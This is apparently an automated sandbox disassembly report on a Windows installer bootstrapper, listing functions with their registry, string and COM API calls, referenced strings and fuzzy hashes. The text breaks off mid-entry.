Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseOpen
String ID: regutil.cpp
API String ID: 47109696-955085611
Opcode ID: 169fb2777201b3b8084006b046e5bf3b5a9bd6f0ad8c99f6adc6834df9349bed
Instruction ID: 6c8e0473a13fdc7bfb942e788fdeda82fddf4150520339aaa575239d38571e67
Opcode Fuzzy Hash: 169fb2777201b3b8084006b046e5bf3b5a9bd6f0ad8c99f6adc6834df9349bed
Instruction Fuzzy Hash: 7A41D532E11329FBEF215BA4DD05BAD7BA5AB04325F11826BFD09AB251D7358D00DBA0

Function 000D0F6E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 000D0FE4
RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 000D101F

Strings

regutil.cpp, xrefs: 000D1057

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: QueryValue
String ID: regutil.cpp
API String ID: 3660427363-955085611
Opcode ID: 276dd23baf69de83855270db4fb3f9c7d14c08eb6415650749932a4af4188bd3
Instruction ID: fda01d2b9bd6d0ca5be2915fc41e476251141c3c3d19598a6bb82b051e06f585
Opcode Fuzzy Hash: 276dd23baf69de83855270db4fb3f9c7d14c08eb6415650749932a4af4188bd3
Instruction Fuzzy Hash: 7E417F31D0032AFBDF20AE94C885AEEBBB9EF44710F10416AF914E7251DB719E51DBA0

Function 000C65D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(000DB508,00000000,00000006,00000001,comres.dll,?,00000000,?,00000000,?,?,00000000,00000006,?,comres.dll,?), ref: 000C66A3
GetLastError.KERNEL32 ref: 000C66BF

Strings

comres.dll, xrefs: 000C664A, 000C6698, 000C66D4

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID: comres.dll
API String ID: 203985260-246242247
Opcode ID: cffda1bd5941bfe8c688bc55b85809e8115af832c404db09b7151805123638e1
Instruction ID: d64603b500458cdd55795a32799e6e8a0b1302282f99909584c8b8912ce681b0
Opcode Fuzzy Hash: cffda1bd5941bfe8c688bc55b85809e8115af832c404db09b7151805123638e1
Instruction Fuzzy Hash: 4331E131600205ABDB71AF69D886FAF3BE89F52760F14412DF8159B292DB32CD00C7A1

Function 000D8E07 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000D8CFB: lstrlenW.KERNEL32(00000100,?,?,000D9098,000002C0,00000100,00000100,00000100,?,?,?,000B7B40,?,?,000001BC,00000000), ref: 000D8D1B

RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,000DB4F0,wininet.dll,?), ref: 000D8F07
RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,000DB4F0,wininet.dll,?), ref: 000D8F14

Part of subcall function 000D0E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,000D5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 000D0E52

Part of subcall function 000D0D1C: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,000B8BD8), ref: 000D0D77
Part of subcall function 000D0D1C: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,000B8BD8,00000000), ref: 000D0D99

Strings

wininet.dll, xrefs: 000D8E7C, 000D8EC9

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Close$EnumInfoOpenQuerylstrlen
String ID: wininet.dll
API String ID: 2680864210-3354682871
Opcode ID: 01b9b6bf3b02533f9834e3cc9bc3906f05a22c57c11789fb26f4937a060ab1ad
Instruction ID: df63049fc02dd661a93315a19de4bf9f9c6d1e03a560aca3b1e9ac001986053f
Opcode Fuzzy Hash: 01b9b6bf3b02533f9834e3cc9bc3906f05a22c57c11789fb26f4937a060ab1ad
Instruction Fuzzy Hash: 88311B76C01229BFCF21AF94CC419EEFBBAEF44351B15816AE90176222DB314E50DFA0

Function 000D9220 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000D8CFB: lstrlenW.KERNEL32(00000100,?,?,000D9098,000002C0,00000100,00000100,00000100,?,?,?,000B7B40,?,?,000001BC,00000000), ref: 000D8D1B

RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000), ref: 000D9305
RegCloseKey.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 000D931F

Part of subcall function 000D0AD5: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,000A0491,?,00000000,00020006), ref: 000D0AFA

Part of subcall function 000D1392: RegSetValueExW.ADVAPI32(00020006,00020006,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0009F1C2,00000000,?,00020006), ref: 000D13C5

Part of subcall function 000D1392: RegDeleteValueW.ADVAPI32(00020006,00020006,00000000,?,?,0009F1C2,00000000,?,00020006,?,00020006,00020006,00000000,?,?,?), ref: 000D13F5

Part of subcall function 000D1344: RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,?,0009F11A,00000005,Resume,?,?,?,00000002,00000000), ref: 000D1359

Strings

%ls\%ls, xrefs: 000D9281

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Value$Close$CreateDeletelstrlen
String ID: %ls\%ls
API String ID: 3924016894-2125769799
Opcode ID: 239d89fdbbbec2c1ba4f857dd474572a708a90e4bc01b1bb089be2bc5fd2702d
Instruction ID: 1e074fee2a047d7c29899e28eac48a648483f57d28562975818044f614d8fa00
Opcode Fuzzy Hash: 239d89fdbbbec2c1ba4f857dd474572a708a90e4bc01b1bb089be2bc5fd2702d
Instruction Fuzzy Hash: 7631ED72C0122EBBCF11AF95CC818EEBBB9FF04750B11416AFA0476621D7358E50EBA1

Function 000939CF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00093A32

Strings

crypt32.dll, xrefs: 000939EF, 00093A2E, 00093A30
wininet.dll, xrefs: 000939F0

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: _memcpy_s
String ID: crypt32.dll$wininet.dll
API String ID: 2001391462-82500532
Opcode ID: 20d9f25f4ff598d2956f110480d47adb0513f97da9c1314b068fe09bcabe11f2
Instruction ID: fa0801120b8682682e642aa7c08ec398869c0c0416cb72fa8d73a6fa53cfc0cd
Opcode Fuzzy Hash: 20d9f25f4ff598d2956f110480d47adb0513f97da9c1314b068fe09bcabe11f2
Instruction Fuzzy Hash: 5A115E71600219ABCF18DE19CDD69EFBF69EF94254B14812AFC094B311D631EA109AE0

Function 000D1392 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00020006,00020006,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0009F1C2,00000000,?,00020006), ref: 000D13C5
RegDeleteValueW.ADVAPI32(00020006,00020006,00000000,?,?,0009F1C2,00000000,?,00020006,?,00020006,00020006,00000000,?,?,?), ref: 000D13F5

Strings

regutil.cpp, xrefs: 000D1429

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Value$Delete
String ID: regutil.cpp
API String ID: 1738766685-955085611
Opcode ID: 3b638b6cfa42a7b3b4f494489726fc0d5482406c87dddcdd5118e3981456e009
Instruction ID: 74ba3aabe9337b41e39b84044dbcecabad80c24ad114451538ab959dde5cbf7a
Opcode Fuzzy Hash: 3b638b6cfa42a7b3b4f494489726fc0d5482406c87dddcdd5118e3981456e009
Instruction Fuzzy Hash: F811C632E40339BBEF215EA58C05BEA76E5EF04750F014222FE14EA2A0DB71CD1096E0

Function 0009DCA5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,000B744B,00000000,IGNOREDEPENDENCIES,00000000,?,000DB508), ref: 0009DCF6

Strings

IGNOREDEPENDENCIES, xrefs: 0009DCAD
Failed to copy the property value., xrefs: 0009DD2A

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
API String ID: 1825529933-1412343224
Opcode ID: bca2ccb64d428e203eef6cdd1793d3ed809358756bdc254bbe4a75d5731cc516
Instruction ID: f970ce530f9955c967529705013f70bda65ce79222ae1967c25f8ac57ed39349
Opcode Fuzzy Hash: bca2ccb64d428e203eef6cdd1793d3ed809358756bdc254bbe4a75d5731cc516
Instruction Fuzzy Hash: 01110272245215AFDF204F44CC85FA9B3E5EF18324F264277FA189B2A1C7B0AC50E791

Function 000D54F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,000A8C90,?,00000001,20000004,00000000,00000000,?,00000000), ref: 000D5527
SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,000A8C90,?), ref: 000D5542

Strings

aclutil.cpp, xrefs: 000D5565

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: InfoNamedSecuritySleep
String ID: aclutil.cpp
API String ID: 2352087905-2159165307
Opcode ID: d047698b38bd34579518faf464fca2394658a7806cffb7badfefcca72b7c0057
Instruction ID: 395c6a04e18b15ad2ebc7d4e734e412cb6def59e2b1462e54a5fd8b664032cae
Opcode Fuzzy Hash: d047698b38bd34579518faf464fca2394658a7806cffb7badfefcca72b7c0057
Instruction Fuzzy Hash: 6A018237801A28BBDF229E94DC05ECE7EA6EF44761F020116BE0466214D6328D60ABB0

Function 000A55BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 000A55D9
CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 000A5633

Strings

Failed to initialize COM on cache thread., xrefs: 000A55E5

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: InitializeUninitialize
String ID: Failed to initialize COM on cache thread.
API String ID: 3442037557-3629645316
Opcode ID: 418897b6d290e91b4d8b83c7b35a2abdf818c2222b80f572436ad7174270887b
Instruction ID: bfc44872a75d7a8c6cec9a205e115213e09af482b093924139bd81fc2df09e83
Opcode Fuzzy Hash: 418897b6d290e91b4d8b83c7b35a2abdf818c2222b80f572436ad7174270887b
Instruction Fuzzy Hash: 2E016172600619BFC7058FA5DC80DDAF7ACFF08354F418126FA08D7211DB31AE149BA4

Function 0009155F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(0000007F,00000000,00000000,000A6EF3,00000000,000A6EF3,00000000,00000000,000A6EF3,00000000,00000000,00000000,?,00092326,00000000,00000000), ref: 000915A3
GetLastError.KERNEL32(?,00092326,00000000,00000000,000A6EF3,00000200,?,000D516B,00000000,000A6EF3,00000000,000A6EF3,00000000,00000000,00000000), ref: 000915AD

Strings

strutil.cpp, xrefs: 000915D1

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorLastString
String ID: strutil.cpp
API String ID: 3728238275-3612885251
Opcode ID: 3e0dbd743d339c371137e7bca876ee4a970d05548d10e42987a069ef94a2fd55
Instruction ID: aa74e5e02afbaa2da71b16b64bb17adf8c56f230812d1f718e7415a4004cf2bf
Opcode Fuzzy Hash: 3e0dbd743d339c371137e7bca876ee4a970d05548d10e42987a069ef94a2fd55
Instruction Fuzzy Hash: 2201F537600A26B7DF219E969C40E977BA9EF85760B030215FE159B150D721DC1097F0

Function 000D3803 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 000D3849
SysFreeString.OLEAUT32(00000000), ref: 000D387C

Strings

xmlutil.cpp, xrefs: 000D3819, 000D3860

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: 1ef1407d9fef8416de4fae280185a3a6bba93fd332c882bf1f4054190d18d563
Instruction ID: d791cd0e302fe60c54087a3569d4bf4978dd32dd6fd3357a6b05edfe15107659
Opcode Fuzzy Hash: 1ef1407d9fef8416de4fae280185a3a6bba93fd332c882bf1f4054190d18d563
Instruction Fuzzy Hash: 42018F75640319ABEB211A949C04FBB72D8DF45B60F51413AFE04AB741CA78CE01BBB6

Function 000D388A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 000D38D0
SysFreeString.OLEAUT32(00000000), ref: 000D3903

Strings

xmlutil.cpp, xrefs: 000D38A0, 000D38E7

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: String$AllocFree
String ID: xmlutil.cpp
API String ID: 344208780-1270936966
Opcode ID: 149f5e3db3f04c75aa0a41e740320a29b42720ebbd72208722c908d6c2cd3cfc
Instruction ID: 395b5ea2e6ea3481bb18e2bddbe7283ea74c4b62ff607b991be322e041eca220
Opcode Fuzzy Hash: 149f5e3db3f04c75aa0a41e740320a29b42720ebbd72208722c908d6c2cd3cfc
Instruction Fuzzy Hash: 7B018F75A40319FBEB204A949808F7B77D8EF45B60F150027FD05AB340CAB88E00ABB2

Function 000D3AC9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000D0E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,000D5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 000D0E52

RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,000D396A,?), ref: 000D3B3A

Strings

EnableLUA, xrefs: 000D3B0C
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 000D3AE4

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseOpen
String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 47109696-3551287084
Opcode ID: d613fd9e7166eb605fe4fbde4fbe4818c37faf68d14c31da70419f40b715dbb1
Instruction ID: 07a0789db87c66c34f0adc17997532032e0868949a1f0c0ff7287b8244fe9b00
Opcode Fuzzy Hash: d613fd9e7166eb605fe4fbde4fbe4818c37faf68d14c31da70419f40b715dbb1
Instruction Fuzzy Hash: 90012C32911238EBD710AAA4C80ABEEFBACDB05721F21416BAA01A7251D3755F50E6A5

Function 0009501B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00091104,?,?,00000000), ref: 0009503A
CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00091104,?,?,00000000), ref: 0009506A

Strings

burn.clean.room, xrefs: 00095027, 00095034, 00095061

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CompareStringlstrlen
String ID: burn.clean.room
API String ID: 1433953587-3055529264
Opcode ID: c188dd86245bbcb0487986808653b73b043fcfca8fb120960c943aac4f86bf35
Instruction ID: af756cee48282cee036ceca80445df7ddfa3c5508b5a994ad379264be305d6c7
Opcode Fuzzy Hash: c188dd86245bbcb0487986808653b73b043fcfca8fb120960c943aac4f86bf35
Instruction Fuzzy Hash: 2801F9B2600625AE97318F5ADC84D77B7ACFB497517104117FA0DC3A20D3759C50E7E2

Function 000D6754 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 000D67B3

Part of subcall function 000D85CB: SystemTimeToFileTime.KERNEL32(?,00000000,00000000,clbcatq.dll,00000000,clbcatq.dll,00000000,00000000,00000000), ref: 000D86D8
Part of subcall function 000D85CB: GetLastError.KERNEL32 ref: 000D86E2

Strings

atomutil.cpp, xrefs: 000D67A1
clbcatq.dll, xrefs: 000D6780

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Time$ErrorFileFreeLastStringSystem
String ID: atomutil.cpp$clbcatq.dll
API String ID: 211557998-3749116663
Opcode ID: 101eef5a52c7b06ececb42778d370c9705765e2519b038d47bc17f7ca3b95272
Instruction ID: 025688a07dfb2f1abd94f4da22d38aacf58853da48e5490e00a077f02cc7d241
Opcode Fuzzy Hash: 101eef5a52c7b06ececb42778d370c9705765e2519b038d47bc17f7ca3b95272
Instruction Fuzzy Hash: 46018F7190571AFBCB209E859981CAEFBB8EB14764B51427BFA0467200D3325E10DBB0

Function 00096418 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 0009642A

Part of subcall function 000D09BB: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00095D8F,00000000), ref: 000D09CF
Part of subcall function 000D09BB: GetProcAddress.KERNEL32(00000000), ref: 000D09D6
Part of subcall function 000D09BB: GetLastError.KERNEL32(?,?,?,00095D8F,00000000), ref: 000D09ED

Part of subcall function 00095BF0: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00095C77

Strings

Failed to get 64-bit folder., xrefs: 0009644D
Failed to set variant value., xrefs: 00096467

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
String ID: Failed to get 64-bit folder.$Failed to set variant value.
API String ID: 3109562764-2681622189
Opcode ID: 4a119bf3dbe8ab0d7f0cf149fd53662f6e0fea08ef9e89b42a32687270dfac0d
Instruction ID: c0134674c872b8c18aa6e1f471cad4ff83f092e8d6b9f57af00bcafe50dffece
Opcode Fuzzy Hash: 4a119bf3dbe8ab0d7f0cf149fd53662f6e0fea08ef9e89b42a32687270dfac0d
Instruction Fuzzy Hash: 1A016232901328BBDF11A7D4DC06AEEBB78EF00721F114156F90066152D7729E40E7E0

Function 000933D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,000910DD,?,00000000), ref: 000933F8
GetLastError.KERNEL32(?,?,?,000910DD,?,00000000), ref: 0009340F

Strings

pathutil.cpp, xrefs: 00093433

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
